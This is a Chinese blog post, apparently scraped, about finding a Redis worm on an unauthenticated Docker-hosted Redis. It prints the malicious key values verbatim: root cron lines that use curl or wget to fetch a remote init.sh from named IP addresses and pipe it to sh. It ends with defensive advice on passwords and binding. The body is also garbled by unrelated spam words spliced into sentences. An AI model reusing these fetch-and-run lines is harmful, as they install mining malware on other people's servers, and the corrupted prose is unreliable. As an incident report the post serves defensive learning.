数据观澜系统运维
快捷导航
您的位置:首页>系统运维>>事实证明,互联网会惩罚每一个裸奔的人之 Redis 扩散病毒 >

事实证明,互联网会惩罚每一个裸奔的人之 Redis 扩散病毒

  发布时间:2025-12-07 20:02:17   作者:玩站小弟   我要评论
前段时间换了台电脑,一大堆开发环境我实在是懒得在本地搞了,每次启动来启动去太麻烦了,索性直接在服务器上开 Docker 部署,docker pull复制粘贴什么 Redis、什么 MySQL 分分钟装 。

前段时间换了台电脑,事实证明一大堆开发环境我实在是互联懒得在本地搞了,每次启动来启动去太麻烦了 ,惩罚索性直接在服务器上开 Docker 部署,裸奔docker pull 复制粘贴什么 Redis 、扩散什么 MySQL 分分钟装好 ,病毒要用的事实证明时候直接远程连接就行了,简直不要太方便。互联

也不是惩罚什么业务场景让我发现了这么一个病毒 ,源码下载因为大部分 Redis Key 都是裸奔设置了过期时间的,开发过程也没感觉到什么问题,扩散纯粹是病毒有一天我闲着没事干,进入 Redis 命令行 keys * 看看,事实证明不看不要紧,互联一看好家伙 ,惩罚多出了几个 key,大概就是云计算下面这样子 :

复制uid:1 uid:2 uid:3 backup1 backup2 backup3 backup41.2.3.4.5.6.7.

多出了 4 个 backup 前缀的 key ,我第一反应这肯定是什么备份文件

正常情况下我根本不会在意,纯粹就是那天确实比较闲,不如来学习下 Redis 吧(哈哈) ,于是 ,禀着好学的基本素养 ,亿华云我分别查看了下这里面的 value 是什么:

复制*/2 * * * * root cd1 -fsSL http://194.87.139.103:8080/cleanfda/init.sh | sh */3 * * * * root wget -q -O- http://194.87.139.103:8080/cleanfda/init.sh | sh */4 * * * * root curl -fsSL http://45.83.123.29/cleanfda/init.sh | sh */5 * * * * root wd1 -q -O- http://45.83.123.29/cleanfda/init.sh | sh1.2.3.4.5.6.7.

wget 是用来下载东西的 ,curl 是用于执行 HTTP 请求,点开 http://45.83.123.29/cleanfda/init.sh 看看到底是什么脚本文件  :

又是改权限,又是建站模板关防火墙删文件的 ,用屁股想都知道这 IP 肯定是国外的了:

查了下发现这是一种 Redis 扩散病毒 ,专门利用 Redis 未授权访问漏洞的挖矿病毒。没错 ,就是 Redis 没设置密码,源码库没授权,让病毒有了可乘之机  。如果服务暴露在互联网上就一定要设置密码 ,不要裸奔 😭,很多同学大部分时间都是在本地开发 ,没有设置密码的习惯或者只是简单的设置成 root 这种

另外,除了设置密码,香港云服务器服务器开放端口的时候最好也指定下 IP ,不然默认的 0.0.0.0:6379 任何 IP 都可以访问

  • Tag:

相关文章

  • 今日CSO:吹哨人还是离职者

    作为C级管理层的核心成员,CSO们似乎一直面临着巨大的压力。他们经常加班过度,工作量巨大,却往往得不到应有的赏识。更糟糕的是,他们很可能成为背锅侠,这已经成为网安行业的普遍观点。许多CSO表示曾经遭遇
    2025-12-07

  • HBase+Elasticsearch,百亿级数据中心架构设计实践

    业务背景今天给大家分享一下我们在公司里,面向多个业务团队设计的数据中心架构,他是如何一步一步的从多业务团队数据现状分析开始,然后逐步的演化设计出一个数据中心架构来的,希望能帮助大家对现在很流行的数据中
    2025-12-07

  • 戴尔PowerEdge服务器支持数据之间直连互通 帮助建立更好共识

    2022开年不久人类医学迎来重大突破1月上旬全球首例人类成功移植猪心脏的手术在美国马里兰大学医学院完成术后48小时内,患者并未发生任何险情,假如未来一段时间猪心脏仍能维持正常工作,这次手术将成为异种器
    2025-12-07

  • 用U盘制作个性化背景,让电脑焕发新生(轻松掌握U盘背景制作教程,个性化你的电脑)

    在现代社会中,电脑已经成为了人们工作、学习和娱乐的重要工具。而想要让电脑焕发新生,个性化定制自己喜欢的背景,是一种很有趣的方式。而使用U盘进行背景制作,不仅简单方便,还可以随时更换背景,满足不同心情和
    2025-12-07

  • 大型集团企业互联网出口管控规划与分析

    2019年国资委下发《关于做好国资国企网络信息安全在线监管平台建设工作的通知》,明确要求:“加快集团公司及所属企业互联网出入口收敛,切实减少暴露面和风险点,初步形成基础设施一张网、资产态势一张图、安全
    2025-12-07

  • 25%的安全负责人遭遇勒索攻击后被撤换

    根据Sophos公司最近的一份报告,在成功抵御勒索软件攻击后,CISO职位得以保留的概率仅为四分之一。行业专家表示,无论CISO是否被认定有过失,或是否有实质性权力阻止此类攻击,该报告的调查结果都给C
    2025-12-07

最新评论